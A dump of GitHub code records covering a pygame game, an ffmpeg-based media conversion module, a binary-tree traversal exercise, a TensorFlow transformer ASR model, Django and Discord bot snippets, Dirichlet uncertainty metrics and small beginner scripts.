keys[pygame.K_RIGHT]:\n self.acc.x = 0,5\n\n # apply friction\n self.acc += self.vel * (-0.12)\n # equations of motion\n self.vel += self.acc\n self.pos += self.vel + 0.5 * self.acc\n # wrap around the sides of the screen\n if self.pos.x > 500:\n self.pos.x = 0\n self.rect.left = self.pos.x\n if self.pos.x < -10:\n self.pos.x = 500\n\n self.rect.center = self.pos\n \nclass Selecao(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"Imagens/personagem/selecao.png\")\n self.rect = self.image.get_rect()\n self.rect.top = 470\n self.rect.right = 800\n\nclass Plataformas(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"Imagens/Primeira Fase/plataforma.png\")\n self.rect = self.image.get_rect()\n self.rect.top = 200\n self.rect.left = 200\n\nclass Paginainicial(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"Imagens/Página inicial/paginainicial2.png\")\n self.rect = self.image.get_rect()\n self.rect.top = -26\n self.rect.left = -16\n\nclass Botaoplay(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"Imagens/Página inicial/play.png\")\n self.rect = self.image.get_rect()\n self.rect.top = 342\n self.rect.bottom = 391\n self.rect.left = 199\n self.rect.right = 314\n\nclass Bolinha(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"Imagens/Primeira Fase/bolinha.png\")\n self.rect = self.image.get_rect()\n self.rect.top = 120\n self.rect.bottom = 200\n self.rect.left = 250\n self.rect.right = 300\n\nclass Iconefinal(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"Imagens/Primeira Fase/iconefinal.png\")\n self.rect = self.image.get_rect()\n self.rect.top = 120\n self.rect.bottom = 200\n self.rect.left = 280\n self.rect.right = 300\n\n\ndef main():\n\n #Inicialização\n pygame.init()\n tela = pygame.display.set_mode([500,650])\n pygame.display.set_caption(\"Jogo PETEEL\")\n relogio = pygame.time.Clock()\n all_sprites = pygame.sprite.Group()\n fundo = pygame.image.load(\"Imagens/Primeira Fase/fundo123desfocado.png\")\n\n #CORES\n cor_azul = (181,244,253)\n\n #Variaveis\n pag_inicial= Paginainicial()\n all_sprites.add(pag_inicial)\n botaoplay= Botaoplay()\n all_sprites.add(botaoplay)\n personagem= Personagem()\n all_sprites.add(personagem)\n personagem1= Personagem1()\n all_sprites.add(personagem1)\n personagem2= Personagem2()\n all_sprites.add(personagem2)\n selecao= Selecao()\n all_sprites.add(selecao)\n plataforma1 = Plataformas()\n #all_sprites.add(plataforma1)\n iconefinal= Iconefinal()\n #all_sprites.add(iconefinal)\n bolinha= Bolinha()\n #all_sprites.add(bolinha)\n\n sair = False\n while sair != True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sair = True\n \n #Parametros\n relogio.tick(30)\n tela.fill(cor_azul)\n (xmouse, ymouse) = pygame.mouse.get_pos()\n\n #Código Página inicial\n if xmouse >= personagem1.rect.left and xmouse <= personagem1.rect.right and ymouse <= personagem1.rect.bottom and ymouse >= personagem1.rect.top:\n if event.type == pygame.MOUSEBUTTONDOWN:\n personagem.image = pygame.image.load(\"Imagens/personagem/personagem1frente_min.png\") #personagem1frente\n personagem.rect = personagem.image.get_rect()\n personagem.rect.center = (800,800)\n selecao.rect.right = 217\n\n if xmouse >= personagem2.rect.left and xmouse <= personagem2.rect.right and ymouse <= personagem2.rect.bottom and ymouse >= personagem2.rect.top:\n if event.type == pygame.MOUSEBUTTONDOWN:\n personagem.image = pygame.image.load(\"Imagens/personagem/personagem2frente_min.png\") #personagem1frente\n personagem.rect = personagem.image.get_rect()\n personagem.rect.center=(800,800)\n selecao.rect.right = 412\n \n if xmouse >= botaoplay.rect.left and xmouse <= botaoplay.rect.right and ymouse <= 351 and ymouse >= 295:\n if event.type == pygame.MOUSEBUTTONDOWN:\n pag_inicial.rect.left = 800\n botaoplay.rect.left = 800\n personagem1.rect.left = 800\n personagem2.rect.left = 800\n personagem.rect.center = (228,200)\n personagem.pos = vec(228,200)\n selecao.rect.right = 800\n fundo = pygame.image.load(\"Imagens/Primeira Fase/fundo1_1.png\")\n\n #Código Movimento do personagem\n personagem.acc = vec(0, 0.5)\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT]:\n personagem.acc.x = -0.5\n\n if keys[pygame.K_RIGHT]:\n personagem.acc.x = 0.5\n \n personagem.acc.x += personagem.vel.x * (-0.12)\n personagem.vel += personagem.acc\n personagem.pos += personagem.vel + 0.5 * personagem.acc\n\n if personagem.pos.x > 500:\n personagem.pos.x = 0\n if personagem.pos.x < 0:\n personagem.pos.x = 500\n\n personagem.rect.center = personagem.pos\n\n \n #Desenhar\n tela.blit(fundo, (0,0))\n all_sprites.draw(tela)\n\n #Updates\n all_sprites.update \n pygame.display.update() \n\n pygame.quit() \nmain()","repo_name":"Victor-J-L/JOGO-PETEEL","sub_path":"primeirafase.py","file_name":"primeirafase.py","file_ext":"py","file_size_in_byte":7296,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37779073493","text":"import re, subprocess, os, json\nfrom lib import user\nfrom lib import errors\nfrom lib import db_object\nfrom lib import files\n# FIXME: Objektbeschreibungsfunktion nach DBObject ausmodularisieren:\nfrom modules import get as get_module\n\ndef process( app ):\n\tquery = app.query\n\tresponse = app.response\n\tsession = app.session\n\tsource_id = int( query.parms[\"id\"] )\n\tmode = query.parms[\"mode\"] if \"mode\" in query.parms else \"convert\"\n\tif app.user.can_read( source_id ):\n\t\tsource_obj = files.File( app, object_id=source_id )\n\t\tif re.match( r\"^video/.*\", source_obj.media_type ):\n\t\t\tnew_poster_offset = float(query.parms[\"poster_offset\"]) if \"poster_offset\" in query.parms else None\n\t\t\tnew_poster_id = int(query.parms[\"poster_id\"]) if \"poster_id\" in query.parms else None\n\t\t\tif new_poster_id and app.user.can_write( source_id ) and app.user.can_read( new_poster_id ):\n\t\t\t\tnew_poster_obj = files.File( app, object_id=new_poster_id )\n\t\t\telse:\n\t\t\t\tnew_poster_obj = None\n\t\t\t# zur Bestimmung der Größen und Bitraten der Alternativobjekte identifizieren wir zunächst das Orignalobjekt:\n\t\t\tsource_size = source_obj.get_size()\n\t\t\tsource_meta = source_obj.identify()\n\t\t\tsource_width = int( source_meta[\"mplayer\"][\"id\"][\"video\"][\"width\"] )\n\t\t\tsource_rate = round(source_size*8/float(source_meta[\"mplayer\"][\"id\"][\"length\"])/1000)\n\t\t\tresults = []\n\t\t\tclass ConversionDescription:\n\t\t\t\tdef __init__( self, role, width, media_type, rate=0, condition=lambda x: True ):\n\t\t\t\t\tself.role = role\n\t\t\t\t\tself.width = width\n\t\t\t\t\tself.media_type = media_type\n\t\t\t\t\tself.rate = rate\n\t\t\t\t\tself.condition = condition\n\t\t\t\tdef applies( self ):\n\t\t\t\t\treturn self.condition(self)\n\t\t\t\tdef __eq__( self, other ):\n\t\t\t\t\t# rate is not part of equality, because this is used to compare conversion candidates with already existing substitutes \n\t\t\t\t\t# and bitrate is deemed to specific for that purpose; we just assume rates are ok/equal for a given size\n\t\t\t\t\treturn (\t(self.role, self.width, self.media_type, self.applies()) ==\n\t\t\t\t\t\t\t\t(other.role, other.width, other.media_type, other.applies()) )\n\t\t\t\tdef __str__( self ):\n\t\t\t\t\treturn( \"(role=%s, width=%dpx, media_type=%s, rate=%dk, applies=%s)\" % (self.role, self.width, self.media_type, self.rate, str(self.applies())) )\n\t\t\t# we want a poster image, an mp4-substitute in source_width for non-mp4 sources and a scaled down mp4-substitute for big sources:\n\t\t\tmissing_conversions = [\n\t\t\t\tConversionDescription( role=\"poster\", width=min(1280, source_width), media_type=\"image/jpeg\" ),\n\t\t\t\tConversionDescription( role=\"compatible\", width=source_width, media_type=\"video/mp4\", rate=source_rate,\n\t\t\t\t\t\t condition = lambda self: source_obj.media_type != \"video/mp4\" ),\n\t\t\t\tConversionDescription( role=\"compatible\", width=min(1280, source_width), media_type=\"video/mp4\", rate=min(2000, source_rate),\n\t\t\t\t\t\t condition = lambda self: (self.width < (source_width*0.8)) and (self.rate < (source_rate*0.8)) ),\n\t\t\t]\n\t\t\tc = app.db.cursor()\n\t\t\t# Hier müssen wir zunächst prüfen ob das angefragte Objekt selbst schon ein Substitute-Objekt ist, ...\n\t\t\tc.execute( \"\"\"select original_id from substitutes where substitute_id=?\"\"\", [source_obj.id] )\n\t\t\tif c.fetchone():\n\t\t\t\t# ... denn für Substitute-Objekte sollten keine weiteren Substitute-Objekte generiert werden.\n\t\t\t\tmissing_conversions = []\n\t\t\tc.execute( \"\"\"select s.substitute_id, s.type, s.size, s.priority, sobj.id from substitutes s\n\t\t\t\t\t\t\tleft join objects sobj on sobj.id=s.substitute_id\n\t\t\t\t\t\t\twhere s.original_id=?\"\"\", [source_obj.id] )\n\t\t\tfor row in c:\n\t\t\t\tsubstitute = { \"substitute_id\" : int(row[0]), \"type\" : row[1], \"size\" : int(row[2]), \"priority\" : int(row[3]) }\n\t\t\t\tsobj_id = row[4]\n\t\t\t\tif sobj_id==None:\n\t\t\t\t\t# Zombie-Substitutes bereinigen (FIXME: sollte das von DBObject.delete() erledigt werden?):\n\t\t\t\t\tdel_c = app.db.cursor()\n\t\t\t\t\tdel_c.execute( \"\"\"delete from substitutes where substitute_id=?\"\"\", [substitute[\"substitute_id\"]] )\n\t\t\t\telse:\n\t\t\t\t\tsubstitute_obj = db_object.DBObject( app, object_id=substitute[\"substitute_id\"] )\n\t\t\t\t\tconversion = ConversionDescription( role=substitute[\"type\"], width=substitute[\"size\"], media_type=substitute_obj.media_type )\n\t\t\t\t\tif conversion in missing_conversions:\n\t\t\t\t\t\tif substitute[\"type\"]==\"poster\" and (new_poster_offset or new_poster_obj):\n\t\t\t\t\t\t\t# bestehendes Poster-Substitute entfernen, da es neu definiert werden soll:\n\t\t\t\t\t\t\tdel_c = app.db.cursor()\n\t\t\t\t\t\t\tdel_c.execute( \"\"\"delete from substitutes where original_id=? and substitute_id=?\"\"\", [source_obj.id,substitute_obj.id] )\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tmissing_conversions.remove( conversion )\n\t\t\t\t\t\t\tresults.append( substitute )\n\t\t\t\t\telse:\n\t\t\t\t\t\tresults.append( substitute )\n\t\t\terror_list = []\n\t\t\tif mode == \"convert\":\n\t\t\t\t# Alle fehlende Objekte sofort ohne Daten anlegen, um Mehrfachkonvertierung zu vermeiden:\n\t\t\t\tnew_objects = []\n\t\t\t\tfor conversion in [x for x in missing_conversions if x.applies()]:\n\t\t\t\t\t# Privilege-Escalation damit nicht nur der Eigentümer des Target-Objekts diesen Code ausführen kann:\n\t\t\t\t\tapp_old_user = app.user\n\t\t\t\t\tapp.user = user.get_admin_user(app)\n\t\t\t\t\texisting_object_id = None\n\t\t\t\t\tif conversion.role==\"poster\" and new_poster_obj:\n\t\t\t\t\t\texisting_object_id = new_poster_obj.id\n\t\t\t\t\tnew_obj = files.File( app, object_id=existing_object_id, parent_id=source_obj.id, media_type=conversion.media_type )\n\t\t\t\t\tif not existing_object_id:\n\t\t\t\t\t\tnew_obj.conversion = conversion;\n\t\t\t\t\t\tnew_objects.append( new_obj )\n\t\t\t\t\tsubstitute = { \"substitute_id\" : new_obj.id, \"type\" : conversion.role, \"size\" : conversion.width, \"priority\" : None }\n\t\t\t\t\tresults.append( substitute )\n\t\t\t\t\tapp.user = app_old_user\n\t\t\t\t\tc = app.db.cursor()\n\t\t\t\t\tc.execute( \"\"\"insert into substitutes (original_id, substitute_id, type, size) values(?,?,?,?)\"\"\", \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t[source_obj.id, new_obj.id, conversion.role, conversion.width] )\n\t\t\t\t# Konvertierungsvorgänge für angelegte Objekte durchführen:\n\t\t\t\tfor new_obj in new_objects:\n\t\t\t\t\t# this may take a long time, so wie have to commit first:\n\t\t\t\t\tapp.db.commit()\n\t\t\t\t\tbase_type, sub_type = new_obj.media_type.split(\"/\")\n\t\t\t\t\tnew_tmp_name = new_obj.storage_path+\".tmp.\"+sub_type\n\t\t\t\t\tif( re.match(r\"^video/.*\", new_obj.media_type) ):\n\t\t\t\t\t\t# Konvertierung mit geänderter Breite bei Erhaltug des Seitenverhältnisses:\n\t\t\t\t\t\t# http://stackoverflow.com/questions/8218363/maintaining-ffmpeg-aspect-ratio\n\t\t\t\t\t\tp = subprocess.Popen( [\"ffmpeg\", \"-y\", \"-i\", source_obj.storage_path, \"-vf\", \"scale=%d:trunc(ow/a/2)*2\" % (new_obj.conversion.width), \n\t\t\t\t\t\t\t\t\t\t\t\t\t\"-r\", \"25\", \"-b\", \"%dk\" % new_obj.conversion.rate, \"-qmin\", \"0\", \"-strict\", \"-2\", new_tmp_name],\n\t\t\t\t\t\t\t\t\t\t\t\tstdout=subprocess.PIPE, stderr=subprocess.PIPE )\n\t\t\t\t\telif( new_obj.conversion.role==\"poster\" and new_obj.media_type == \"image/jpeg\" ):\n\t\t\t\t\t\t# Vorschaubild bei Zeitindex 3s extrahieren:\n\t\t\t\t\t\tp = subprocess.Popen( [\"ffmpeg\", \"-y\", \"-i\", source_obj.storage_path, \"-vf\", \"scale=%d:trunc(ow/a/2)*2\" % (new_obj.conversion.width), \n\t\t\t\t\t\t\t\t\t\t\t\t\t\"-ss\", str(new_poster_offset if new_poster_offset else 3), \"-vframes\", \"1\", new_tmp_name],\n\t\t\t\t\t\t\t\t\t\t\t\tstdout=subprocess.PIPE, stderr=subprocess.PIPE )\n\t\t\t\t\telse:\n\t\t\t\t\t\traise NotImplementedError( \"missing operation for conversion: %s\" % (str(new_obj.conversion)) )\n\t\t\t\t\tstdout, stderr = p.communicate()\n\t\t\t\t\tif p.returncode!=0:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t# FIXME: Löschenfunktion nach DBObject ausmodularisieren und Dateibereinigung nach files.File:\n\t\t\t\t\t\t\t# Privilege-Escalation damit nicht nur der Eigentümer des Target-Objekts diesen Code ausführen kann:\n\t\t\t\t\t\t\tapp_old_user = app.user\n\t\t\t\t\t\t\tapp.user = user.get_admin_user(app)\n\t\t\t\t\t\t\tdb_object.DBObject.delete_in( app, [new_obj.id] )\n\t\t\t\t\t\t\tapp.user = app_old_user\n\t\t\t\t\t\t\tos.remove( new_tmp_name )\n\t\t\t\t\t\t\tc = app.db.cursor()\n\t\t\t\t\t\t\tc.execute( \"\"\"delete from substitutes where original_id=? and substitute_id=?\"\"\", [source_obj.id, new_obj.id] )\n\t\t\t\t\t\t\tresults = [x for x in results if x[\"substitute_id\"]!=new_obj.id]\n\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\terror_list.append( e )\n\t\t\t\t\t\terrmsg = stderr.decode().split(\"\\n\")[-1]\n\t\t\t\t\t\terror_list.append( errors.InternalProgramError(errmsg) )\n\t\t\t\t\telse:\n\t\t\t\t\t\tos.rename( new_tmp_name, new_obj.storage_path )\n\t\t\t# Fehlerbehandlung:\n\t\t\tif error_list:\n\t\t\t\tmsg = \"\"\n\t\t\t\tfor error in error_list:\n\t\t\t\t\tif msg:\n\t\t\t\t\t\tmsg += \"; \"\n\t\t\t\t\tmsg += str(error)\n\t\t\t\traise errors.InternalProgramError( msg )\n\t\t\telse:\n\t\t\t\tfor result in results:\n\t\t\t\t\tresult[\"substitute_object\"] = get_module.get(app, object_ids=[result[\"substitute_id\"]])\n\t\t\t\tresponse.output = json.dumps( {\"succeeded\": True,\n\t\t\t\t\t\t\t\t\t\t\"substitutes\": results} )\n\t\telif re.match( r\"^audio/.*\", source_obj.media_type ):\n\t\t\t# TODO: add safe conversions\n\t\t\tresults = []\n\t\t\tresponse.output = json.dumps( {\"succeeded\": True,\n\t\t\t\t\t\t\t\t\t\"substitutes\": results} )\n\t\telse:\n\t\t\traise NotImplementedError( \"unsupported media type: \"+source_obj.media_type )\n\telse:\n\t\traise errors.PrivilegeError()\n","repo_name":"syslock/ems","sub_path":"modules/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":8839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4258843613","text":"class TreeNode():\n def __init__(self,value) -> None:\n self.value=value\n self.left=None\n self.right=None\ndef insert_alter(root:TreeNode,value:int)->TreeNode:\n if root is None:\n return TreeNode(value)\n else:\n if root.value>=value:\n root.left=insert_alter(root.left,value)\n else:\n root.right=insert_alter(root.right,value)\n return root\ndef level_order_traversal(root:TreeNode)->list:\n queue=list()\n answer=list()\n queue.append(root)\n while(len(queue)):\n length=len(queue)\n temp=[]\n for _ in range(length):\n q=queue.pop(0)\n temp.append(q.value)\n if q.left:\n queue.append(q.left)\n if q.right:\n queue.append(q.right)\n answer.append(temp)\n return answer\ndef pre_order_traversal(root:TreeNode)->None:\n if root is not None:\n print(root.value,end=' ')\n pre_order_traversal(root.left)\n pre_order_traversal(root.right)\ndef in_order_traversal(root:TreeNode)->None:\n if root is not None:\n in_order_traversal(root.left)\n print(root.value,end=' ')\n in_order_traversal(root.right)\ndef post_order_traversal(root:TreeNode)->None:\n if root is not None:\n post_order_traversal(root.left)\n post_order_traversal(root.right)\n print(root.value,end=' ')\nif __name__=='__main__':\n tree=TreeNode(5)\n insert_alter(tree,3)\n insert_alter(tree,2)\n insert_alter(tree,4)\n insert_alter(tree,7)\n insert_alter(tree,6)\n insert_alter(tree,8)\n lister=level_order_traversal(tree)\n print(lister)\n pre_order_traversal(tree)\n print()\n in_order_traversal(tree)\n print()\n post_order_traversal(tree)\n","repo_name":"farhan1503001/Hackerrank-Python-Language-Problems","sub_path":"Python datastructuresleetcode/level_order_traversal.py","file_name":"level_order_traversal.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"10672782696","text":"'''@file model.py\ncontains de Model class\nDuring the training , using greadysearch decoder, there is loss.\nDuring the dev/infer, using beamsearch decoder, there is no logits, therefor loss, only predsself.\nbecause we cannot access label during the dev set and need to depend on last time decision.\n\nso, there is only infer and training\n'''\n\nimport tensorflow as tf\nimport logging\n\nfrom .seq2seqModel import Seq2SeqModel, SOS_IDX\nfrom .utils.tools import right_shift_rows\n\n\nclass Transformer(Seq2SeqModel):\n '''a general class for an encoder decoder system\n '''\n\n def __init__(self, tensor_global_step, encoder, decoder, training, args,\\\n batch=None, name='transformer'):\n '''Model constructor\n Args:\n '''\n self.name = name\n self.args = args\n self.training = training\n super().__init__(tensor_global_step, encoder, decoder, training,\\\n args, batch, name=name)\n\n def __call__(self, feature, len_features, labels=None, len_labels=None, reuse=False):\n with tf.variable_scope(self.name, reuse=reuse):\n encoder = self.gen_encoder(\n training=self.training,\n args=self.args)\n decoder = self.gen_decoder(\n training=self.training,\n global_step=self.global_step,\n args=self.args)\n\n with tf.variable_scope(encoder.name or 'encoder'):\n encoded, len_encoded = encoder(feature, len_features)\n\n with tf.variable_scope(decoder.name or 'decoder'):\n if not self.training: # infer phrases\n if self.args.beam_size>1:\n logging.info('beam search with language model ...')\n results, preds, len_decoded = decoder.beam_decode_rerank(\n encoded,\n len_encoded)\n else:\n logging.info('gready search ...')\n logits, preds, len_decoded = decoder.decoder_with_caching(\n encoded,\n len_encoded)\n else:\n logging.info('teacher-forcing training ...')\n labels_sos = right_shift_rows(\n p=labels,\n shift=1,\n pad=SOS_IDX)\n\n logits, preds, len_decoded = decoder(\n encoded=encoded,\n len_encoded=len_encoded,\n decoder_input=labels_sos)\n\n return logits, preds, len_decoded\n","repo_name":"eastonYi/asr-tf1","sub_path":"models/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"70274020883","text":"import json\nfrom pathlib import Path\n\nfrom discord.ext import commands\n\nfrom database import db\n\nLOCALES = {}\nfor i in Path('bot/translated/').glob('*.json'):\n with open(i.absolute(), encoding='utf-8') as f:\n LOCALES[i.stem.lower()] = json.load(f)\n\n\nasync def get_phrase(ctx: commands.Context, key: str) -> str:\n global LOCALES\n\n lang = await db.get_language(ctx)\n lang = lang.lower()\n if lang not in LOCALES:\n return LOCALES['en'][key]\n\n try:\n return LOCALES[lang][key]\n except KeyError:\n return LOCALES['en'][key]\n","repo_name":"l4blee/nosok","sub_path":"bot/languages.py","file_name":"languages.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"74624346960","text":"\"\"\"djangoProj182 URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\nfrom ProfileApp import views\n\nurlpatterns = [\n path('Profile', views.Profile, name=\"Profile\"),\n path('Education', views.Education, name=\"Education\"),\n path('Attention', views.Attention, name=\"Attention\"),\n path('Career', views.Career, name=\"Career\"),\n path('RoleModel', views.RoleModel, name=\"RoleModel\"),\n path('ShowMyData', views.ShowMyData, name=\"ShowMyData\"),\n path('listProduct', views.listProduct, name='listProduct'),\n path('inputProduct', views.inputProduct, name='inputProduct'),\n path('showGoodsList', views.showGoodsList, name='showGoodsList'),\n]\n","repo_name":"arrichaChamontee/djangoProj182","sub_path":"ProfileApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72765393680","text":"svar=input(\"Hur många grader i farenheit?: \")#tar in vilken farenheit det är ## kan göras bättre\nf=float(svar)#omvandlar svaret till formel formen\nc=(f-32)*5/9#räknar om farenheit till celsius\nprint(c,\"grader celsius\")#skriver ut vilken grader celsius det är\n\nif c>30:\n print (c,\"Sir, it's very hot today\")\nelif c<-10: \n print (c,\"Sir, bring plenty of clothes\")\nelse:\n print (c, \"Sir, the temperature is to your liking\")","repo_name":"Derpmander/OVNING_2.11","sub_path":"ovn_2.3.py","file_name":"ovn_2.3.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"sv","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73242706960","text":"from scipy.special import psi, gammaln\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score\nimport tensorflow as tf\n\n\ndef dirichlet_kl_divergence(alpha_c_target, alpha_c_pred, eps=10e-10):\n\n alpha_0_target = tf.reduce_sum(alpha_c_target, axis=-1, keepdims=True)\n alpha_0_pred = tf.reduce_sum(alpha_c_pred, axis=-1, keepdims=True)\n\n term1 = tf.math.lgamma(alpha_0_target) - tf.math.lgamma(alpha_0_pred)\n term2 = tf.math.lgamma(alpha_c_pred + eps) - tf.math.lgamma(alpha_c_target + eps)\n\n term3_tmp = tf.math.digamma(alpha_c_target + eps) - tf.math.digamma(alpha_0_target + eps)\n term3 = (alpha_c_target - alpha_c_pred) * term3_tmp\n\n result = tf.squeeze(term1 + tf.reduce_sum(term2 + term3, keepdims=True, axis=-1))\n\n return result\n\n\ndef dirichlet_kl_divergence_reverse(alpha_c_target, alpha_c_pred, eps=10e-10):\n return dirichlet_kl_divergence(alpha_c_target=alpha_c_pred,\n alpha_c_pred=alpha_c_target,\n eps=eps)\n\ndef concentrations_from_logits(logits):\n logits = tf.cast(logits, tf.float64)\n alpha_c = tf.exp(logits)\n alpha_c = tf.clip_by_value(alpha_c, clip_value_min=10e-25, clip_value_max=10e25)\n return alpha_c\n\ndef log_sum(logits, keepdims=False):\n return tf.reduce_sum(logits, axis=-1, keepdims=keepdims)\n\ndef probability_from_concentration(alpha_c):\n alpha_0 = tf.reduce_sum(alpha_c, axis=-1, keepdims=True)\n return alpha_c / alpha_0\n\n\ndef probability_from_logits(logits):\n alpha_c = concentrations_from_logits(logits)\n prob = probability_from_concentration(alpha_c)\n return prob\n\n\ndef max_probability_from_logits(logits):\n prob = probability_from_logits(logits)\n return tf.reduce_max(prob, axis=-1)\n\n\ndef precision_from_logits(logits, keepdims=False):\n alpha_c = concentrations_from_logits(logits)\n return tf.reduce_sum(alpha_c, axis=-1, keepdims=keepdims)\n\n\ndef entropy(logits, keepdims=False):\n prob = probability_from_logits(logits)\n return -tf.reduce_sum(prob * tf.math.log(prob), axis=-1, keepdims=keepdims)\n\n\ndef differential_entropy(logits):\n alpha_c = concentrations_from_logits(logits)\n alpha_0 = tf.reduce_sum(alpha_c, axis=-1, keepdims=True)\n\n lgamma_alpha_c = tf.math.lgamma(alpha_c)\n lgammaln_alpha_0 = tf.math.lgamma(alpha_0)\n\n digamma_alpha_c = tf.math.digamma(alpha_c)\n digamma_alpha_0 = tf.math.digamma(alpha_0)\n\n temp_mat = tf.reduce_sum((alpha_c - 1) * (digamma_alpha_c - digamma_alpha_0), axis=-1)\n metric = tf.reduce_sum(lgamma_alpha_c, axis=-1) - lgammaln_alpha_0 - temp_mat\n return metric\n\n\ndef mutual_information(logits):\n alpha_c = concentrations_from_logits(logits)\n\n alpha_0 = tf.reduce_sum(alpha_c, axis=-1, keepdims=True)\n\n digamma_alpha_c = tf.math.digamma(alpha_c + 1)\n digamma_alpha_0 = tf.math.digamma(alpha_0 + 1)\n alpha_div = alpha_c / alpha_0\n\n temp_mat = tf.reduce_sum(- alpha_div * (tf.math.log(alpha_c) - digamma_alpha_c), axis=-1)\n metric = temp_mat + tf.squeeze(tf.math.log(alpha_0) - digamma_alpha_0)\n\n return metric\n\ndef differential_entropy (logits):\n logits = logits.astype('float64')\n alpha_c = np.exp(logits)\n alpha_c = np.clip(alpha_c, 10e-10, 10e10) \n alpha_0 = np.sum(alpha_c, axis=-1)\n gammaln_alpha_c = gammaln(alpha_c)\n gammaln_alpha_0 = gammaln(alpha_0)\n \n psi_alpha_c = psi(alpha_c)\n psi_alpha_0 = psi(alpha_0)\n psi_alpha_0 = np.expand_dims(psi_alpha_0, axis = 1)\n \n temp_mat = np.sum((alpha_c-1)*(psi_alpha_c-psi_alpha_0), axis = 1)\n \n metric = np.sum(gammaln_alpha_c, axis=-1) - gammaln_alpha_0 - temp_mat\n return metric\n \ndef mutual_info(logits):\n logits = logits.astype('float64')\n alpha_c = np.exp(logits)\n alpha_c = np.clip(alpha_c, 10e-10, 10e10) \n alpha_0 = np.sum(alpha_c, axis=-1, keepdims = True)\n \n psi_alpha_c = psi(alpha_c+1)\n psi_alpha_0 = psi(alpha_0+1)\n alpha_div = alpha_c / alpha_0\n \n temp_mat = np.sum(- alpha_div*(np.log(alpha_c) - psi_alpha_c), axis=-1)\n metric = temp_mat + np.squeeze(np.log(alpha_0) - psi_alpha_0)\n return metric\n\ndef _get_prob(logits):\n logits = logits.astype('float64')\n alpha_c = np.exp(logits)\n alpha_c = np.clip(alpha_c, 10e-25, 10e25)\n alpha_0 = np.sum(alpha_c, axis=-1)\n alpha_0 = np.expand_dims(alpha_0, axis=-1)\n \n return (alpha_c/ alpha_0)\n \ndef entropy(logits):\n logits = logits.astype('float64')\n prob = np.clip(_get_prob(logits), a_min=10e-25, a_max=np.inf)\n exp_prob = np.log(prob)\n\n ent = -np.sum(prob*exp_prob, axis=-1)\n return ent\n\ndef max_prob (logits):\n logits = logits.astype('float64')\n prob = _get_prob(logits)\n metric = np.max(prob, axis=-1)\n return metric\n\ndef get_scores(in_predict, out_predict, save_path=\"./\", name=\"\", evidential=False):\n\n name = name + \"_\" if name != \"\" else \"\"\n gt_neg_in = np.zeros_like(in_predict[:,0])\n gt_neg_out = np.ones_like(out_predict[:,0])\n gtNeg = np.append(gt_neg_in, gt_neg_out, axis= 0)\n\n logits = np.append(in_predict, out_predict, axis= 0)\n\n roc_prob = round(roc_auc_score(gtNeg, -max_prob(logits)) *100, 2)\n roc_log_sum = round(roc_auc_score(gtNeg, -log_sum(logits)) *100, 2)\n roc_precision = round(roc_auc_score(gtNeg, -precision_from_logits(logits))*100, 2)\n roc_mi = round(roc_auc_score(gtNeg, mutual_info(logits)) *100, 2)\n roc_ent = round(roc_auc_score(gtNeg, entropy(logits)) *100, 2)\n\n print(f\"Seperation Performance AUROC scores: \\n\",\n f\" max. probability: {roc_prob}\\n\",\n f\" Log-Sum: {roc_log_sum}\\n\",\n f\" Precision: {roc_precision}\\n\",\n f\" Mutual Information: {roc_mi}\\n\",\n f\" Entropy: {roc_ent}\\n\")","repo_name":"JakobCode/dpn_rs","sub_path":"Measures/Measures.py","file_name":"Measures.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"69974595601","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 4 11:11:10 2019\n\n@author: Hp\n\"\"\"\n\ninput_string = input(\"Enter the string :\")\ncount = 0\nlist = []\nlower = input_string.lower()\nfor alpha in lower:\n list.append(alpha)\n\nfinal_list = [] \n\nfor num in list: \n if num not in final_list: \n final_list.append(num) \n \nfor elements in final_list:\n if elements in 'abcdefghijklmnopqrstuvwxyz':\n count += 1\nif count == 26:\n print (\"Pangram\")\nelse:\n print (\"Not Pangram\")\n 